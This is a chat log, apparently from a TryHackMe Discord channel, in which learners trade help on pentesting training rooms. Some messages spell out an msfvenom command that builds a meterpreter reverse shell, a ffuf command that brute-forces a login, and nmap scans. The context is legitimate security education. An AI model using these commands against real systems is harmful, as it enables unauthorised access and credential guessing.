Hey! So, I have some time, so I am looking into that silverplatter CTF. So far, I ran nmap, but nothing really interesting there. I've tried gobuster with scanning for dir, where I found images and assets, but they both return error and no subdomains where found. After scanning website I found that probably the exploit needs to be done with HTML5 AV manager (wordpress plugin). I think this is the right way. I check searchsploit with those keywords and there is that exploit, also on exploit-db. However, I am kind of clueless about how to use this exploit :/

PS: I hope it is ok, to write it here like this (sorry, pretty new to this)

Did you find the login form 🙂 ?

Can someone please tell me how to get the python3. 9 smbserver.py to work in my vmware linux box?I tried the whole morning to install python3.9 and the impacket and solve other version script problems. This is needed for the windows privilege escalation - SeBackup/SeRestore) task.

nope

enumerate more then . there should be a login page somewhere , try to bf it 🙂

oh, ok found it now 🙂

No , try some brute-force magic 😉

Done 🙂 this was fun and challenging 🙂 learned some news skills here as well

Congrats , great job 🙂 🚀

Hey there! In the room: Privilege Escalation: Kernel Exploits, when I am as user "karen" and I know that the kernel version is 3.13 and found that exploit on the exploit-db website, how can I download it? Shouldn't I be able to just do wget <link> and it will download it to the current directory?

Download to /tmp directory since it is usually writeable by everyone

kk

I have a question I see there are many many path ways and module … which path way is good for someone who is willing to go for offensive security course ?

Currently I’m almost down with Jr pen tester

You're already on a right path , keep going 🙂

Hi there! I just installed Kali linux on my machine as I was a bit tired of using AttackBox and I wanted to get my hands on Kali and become more comfortable on it myself. Therefore, I have 2 questions I'd like to ask. 1. Things I need to install on Kali that are neccessity? 2. How to get the wordlists on my Kali similar to AttackBox wordlists?

Also, I am all ears to any other suggestions as I am here to learn as much as possible.

Thanks! 🙏

So far, I have installed metasploit-framework, hydra, searchsploit, burpsuit

1. Not much , many cysec related tools are already pre-installed on Kali
2. sudo apt install seclists

All of that should already be pre-installed on Kali 🙂

Right, I'll do that, because I had some issues at the installation, so I am missing some things.

What about the wordlists, those come as well?

Some do . You can install seclists pack with
sudo apt install seclists

cool, thanks a lot!

Is there someone that can help with the file inclusion room?

what's the issue 🙂 ?

For the challenge flag 2. I’ve sent you a message directly

Is the entry point the url or cookie itself or something different all together. I tried direct messaging ya as well

cookie

Running into same type of issue with flag3. Is the request part of the url or am I barking up the wrong tree

Hello can anyone tell me , from which machine should I start solving to learn windows privesc except Blue machine , I already solved some linux machines , now I wanna learn windows so as a beginner what machine should I start?

I would recommend this one 🙂
https://tryhackme.com/room/windowsprivesc20

Hello everyone. Is anyone interested in taking the jr pentester path? I have completed it, but would like to do it again to go over the topics well and prepare for PT1

That is a good idea 🙂

If you already completed then u should try to solve machine it will give you more practical knowledge.

Sorry to ask again but I meant ctf type windows machine not walkthrough also I already did blue so what next .

Have you checked out windows ad exploitation module ?

No what's the name of the module?

This one 🙂
https://tryhackme.com/module/hacking-active-directory

Ok but first I need to learn basic windows exploitation then I can move further to learn AD and that's why I asked you to tell me some ctf type windows machine as I already competed the Windows PrivEsc, now I want to do practice and test my knowledge.

Everything that you need is in path above 🙂

Ok i'm doing Offensive Pentesting Path , there is everything what I need as a beginner. Thanks

Gave +1 Rep to @violet brook (current: #1 - 5062)

What is your full cmd ?

Helo, friendz!

Does anyone who's doing this path to join in some meetings like 30 mins/day and share knowledge about what we accomplished during our journey ?

Since the most valuable method of gaining information is by teaching others, we can try that also combined with this discussion group and learn-by-actual-doing-on-labs ?

Also if someone is looking forward to join me as a team and try the impossible in a real target like a low hanging fruit (for the beginning) Bug Bounty program it would be great!
Please let me know !

Here I am, but before taking part in a real bug bounty program, I would like to get the PT1 certification.

I’m going through the Junior Pentester path again to reinforce the concepts.

It is not the right approach. Just text me in private. Everything is possible. I have only 2 months of an ethical hacking internship and found an XSS , a self XSS with no impact but , i mean is something , is a motivation to keep moving forward. We should do the labs on platform but in. Parallel pick a real target, master your reconn , face problems.

And when do this in team it becomes even more exciting..

That’s so true — sharing ideas and solving problems together is the best part!

Yeah

Is scientifically proven that teaching others, learn by doing and group discussions are the best ways to learn, to retain information

The lowest ones are the lecture and visual/audio stuff

Which are also good when you are in park, or at the country side at you grandparents house , when relaxing in general
That is called passive learning

Subject: Flag Submission Issue in 'Walking An Application' Module - Flag 4

Message Body:

Hello TryHackMe Team / Community,

I am currently working on the "Walking An Application" module and encountering an issue when attempting to submit the fourth flag (Flag 4) from the "Viewing the page source" section.

The expected flag is THM{CHANGE_DEFAULT_CREDENTIALS}.

However, when I try to enter it into the text field, the system seems to add unwanted spaces or prevent the flag from being completed correctly. This prevents me from submitting it and thus, I cannot progress with the exercise. In the input field, the flag appears as THM{CHAN_GEDE_FAULTCRE_DENTIAL }, with spaces and characters that do not match the original flag for the exercise.

I would greatly appreciate your help in resolving this issue so I can complete the task.

Thank you in advance for your time and assistance.

Best regards

That's not the correct framework flag , that flag is for another room . Check out page's source code to find out framework page > Go to the page and inspect recent commits 🙂

Thank you, I could do it, but it is confusing.

Gave +1 Rep to @violet brook (current: #1 - 5153)

Is there a way I can learn..without spending on subscriptions? Because most rooms Im doing in the roadmap is paid..

Go to this page and select free roadmap
https://tryhackme.com/hacktivities/
You can see a complete list of free rooms on the link below 🙂
https://tryhackme.com/hacktivities/search?page=1&contentSubType=free

In the RaceConditions room: Task 7 - I am unable to transfer fund , I made sure proxt and all were off but this thing does not seem to be working and yes this acount has 100 usd so it has no reason to fail or keep spinning while transferring..

Can anyone please help , I think the website is broken .. 😦

yesterday i have completed this room, it was working fine. try restarting...

Restart the Maschine. Also important to note the account who is recieveing only updates after you log off it and log back in if you have it paralell opend to the Account sending

I honestly didn't know this had been packaged, I've been hunting them down on github all this time 😂

Got it to work bro thanks 👍🏻

Gave +1 Rep to @fierce forge (current: #2924 - 1)

Thanks for the help

can I start the Jr pentester path directly by skipping cybersecurity 101? I have completed pre-security path

Definitely don't do that . If you skip fundamentals from Cyber101 you won't get far with Jr.Pentester path . Definitely go with Cyber101 before any other path

Thanks.....on it

Gave +1 Rep to @violet brook (current: #1 - 5208)

I'm still on Cybersecurity 101, taking the #pentester path, how can I start creating a portfolio?

Exactly what kind of portfolio would you wanna start?

This is a great advise. @split basin I did pre-security and cybersecurity 101 in less than 40 days, each day only doing 1-2 hours a day

@wary walrus I am in the same task!

Great job 🙂 🚀

found a weird issue while testing

I'm not taking this path for the cert, just to learn. Do y'all think I could skip the Burp Suite module and come back to it at the end? I started using it in the web hacking module and it's pretty straightforward

isn't this incorrect?

Definitely don't do that . Burp is a fundamental tool , you will use it a lot as a pentester 🙂

Why do you think that it is incorrect ?

Cause Sniper does it sequentially not simultaneously

What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell

What Task do you need it for?

What the Shell?
msfvenom

What the Shell?
msfvenom

Do you really want the Solution or do you want a hint and find it yourself since that way you understand it better

give me the solution i have been stuck here for hours

ok

should be along the lines of: msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell.elf LHOST:10.10.10.5 LPORT:443

incorrect

it says

are you sure that you need port 443?

ahhh ok i see it

What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell isnt that is what the question asking us

remove the .elf from -o shell.elf

so it looks like this: msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443

nah its still not working

Is it saying wrong or unknown error ocured? since that is the solution i have in the Task

Cus if it is unknown error you need to reload the page

Did it work by now?

Noo

It says wrong

Strange. This should be the correct answer, as @fierce forge writes

msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443

just started on room/passiverecon

anyone else here?

I just finished the first nmap room so I'm not too far ahead of you

Congrats , keep up the good work 🙂 🚀

Anyone knows why gobuster and ffuf are lightning quick, but dirb takes forever?

dirbuster? idk

to me gobuster is actually slow

I use dirsearch

https://www.kali.org/tools/dirb/

It's one of the tools in the attack box for the early pentester rooms. I installed and ran all three on my local system via VPN. Gobuster and ffuf were pretty fast, but dirb took ages. I thought it was due to the other two being developed in go, but then it seems dirb was coded in C, so I'm at a loss. The difference in performance is brutal.

I'm having issues with this question, it's saying too many fingerprint on that host so it can't give os version

I can't upload the question but it's on netsac challenge about FTP nonstandard port listening

We have an FTP server listening on a nonstandard port. What is the version of the FTP server?

Perform nmap scan with -p- flag set

ohhh, dirb, I don't use dirb so 🤷‍♂️

hi all, I couldn't get the result in Nmap Basic Port Scans Task 6 UDP scan. is it because UDP is connectionless without handshake + poor connection packet dropped? I tried connecting via different VPN servers (AU's and US's), changed the default -T3 to -T4 (didn't want to slow it down). Try it many times and couldn't get the result. Please let me know if I have done anything wrong. thanks a lot!

└─$ sudo nmap -sU -F -v 10.10.129.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-20 00:42 EDT
Initiating Ping Scan at 00:42
Scanning 10.10.129.48 [4 ports]
Completed Ping Scan at 00:42, 0.39s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:42
Completed Parallel DNS resolution of 1 host. at 00:42, 0.01s elapsed
Initiating UDP Scan at 00:42
Scanning 10.10.129.48 [100 ports]
Increasing send delay for 10.10.129.48 from 0 to 50 due to max_successful_tryno increase to 4
Increasing send delay for 10.10.129.48 from 50 to 100 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.129.48 from 100 to 200 due to max_successful_tryno increase to 6
Increasing send delay for 10.10.129.48 from 200 to 400 due to max_successful_tryno increase to 7
Discovered open port 111/udp on 10.10.129.48
UDP Scan Timing: About 45.67% done; ETC: 00:43 (0:00:37 remaining)
Increasing send delay for 10.10.129.48 from 400 to 800 due to 11 out of 23 dropped probes since last increase.
Completed UDP Scan at 00:43, 104.44s elapsed (100 total ports)
Nmap scan report for 10.10.129.48
Host is up (0.32s latency).
Not shown: 98 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
111/udp open rpcbind

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 104.96 seconds
Raw packets sent: 262 (16.915KB) | Rcvd: 114 (9.228KB)

Could it be you still had a machine running of the previous tasks instead of the one from task 6?

i just tried again and started the task 6 machine. the result is the same.

let me try it, one sec

i just did it after seeing your question

working fine for me

I am not sure why it didn't work for me and I will just move on...

similar thing happened to me in the linux priv module

tried 3-4 times but didn't work

thanks for looking into this @knotty bloom and @rancid lotus.

Gave +1 Rep to @rancid lotus (current: #2939 - 1)

oh wait, I didn't try it yet 🤣

one sec

got busy

anytime brother

I'm pretty sure the reason is that you must run the scan from the Attackbox. That's why the task specifically mentions:
"Launch the VM. On the AttackBox, use the terminal to execute..."

If I run the scan from my own Kali I have the same issue as you. If I run it from the Attackbox the new UDP port shows up.

don't think so

i used the openvpn to connect first and then ran the scan from my system

doesn't need to be from the attack box only

then the thing is just being flaky 🤷‍♂️

yupp

I just completed nmap01

this room with host discovery is amazing!

is there any group that would like to have one person for the upcoming ctf? I don't have one group and don't want to join alone

#1385308722225483926 Here 🙂

awesome thanks!

Gave +1 Rep to @violet brook (current: #1 - 5283)

doing this, is not working, so I added -p143, and got the results back, wondering why would they ask for 143 if only port 111 came back with results

What doesn't work here ?

the port scan works, but I am trying to understand why the port 143 isn't on the first scan

add -p- to your first cmd to scan all ports

so, not always I need to run the exact commands from thm, but instead add more context?

Well it depends , sometimes yes it may need some additional settings

looking at other threads in this discord, people have different opinions as to why it didn't hapened

I'll suggest you don't try to understand every error, to save you the time and the headache
You will always encounter errors that you won't know what the cause is and that's fine
Programs are not meant to be overly perfect

The port might also be protected by a firewall or the service, idk
Just think this might also be the case

yeah make sense. I guess, looking at other threads, the --version-light might be fast and not come back with results that you want

with -all

Yes, I think the "-light" flag is for speed

Your initial scan scans only the most common ports , port 143 may not be included there

Yes, this flag gives more verbose output

Maybe it was in the older version of nmap when the room came out that's why it may be missing from the hint

I see, interesting, I will suggest to review it in the comments section

linux priv capstone challenge was pretty fun, just finished it

wrote my first ever writeup, looking for feedback

https://medium.com/@yashrustagi22.yr/tryhackme-linux-privilege-capstone-challenge-62e8afff45d0

should it be more detailed or uhm is it fine, what can be improved

You can post your writeup in #thm-community-media channel 🙂

oooh okay!

Job seeker portfolio.

yea but how exactly do u wanna start a pentesting portfolio? This isnt webdev lmao

Do CTFs etc.

Have a look at https://secbook.in

And let me know how it is

Also let me know if you have any suggestions and improvements I can make to my portfolio.

I have some feedback for room https://tryhackme.com/room/authenticationbypass
On task 3, we are given a ffuf command to run to try to brute force the login page. But the syntax does not work on a new version of ffuf installed on a local machine (I have not tested on the attack box).
The syntax given is
user@tryhackme$ ffuf -w valid_usernames.txt:W1,10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.102.3/customers/login -fc 200

But the two word lists need to be entered with their own -w flag:
ffuf -w valid_usernames.txt:W1 -w 10-million-passwords-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.102.3/customers/login -fc 200

don't think so, I did on my system as well and the first command ran without any problem

it's version 2.1.0

Thanks, I should have checked the tags on the repo. I just used the version on apt install, which seems hasn't kept up to date.

Gave +1 Rep to @rancid lotus (current: #1924 - 2)

I got a new phone, a few weeks ago. Haven't been on try hackme for months, recently joined the discord community. I'm having trouble recovering my old account....damn

What is the problem exactly ?

@violet brook goodmorning, I don't remember my password

Try to reach out to Discord's support , they can probably help you recover it 🙂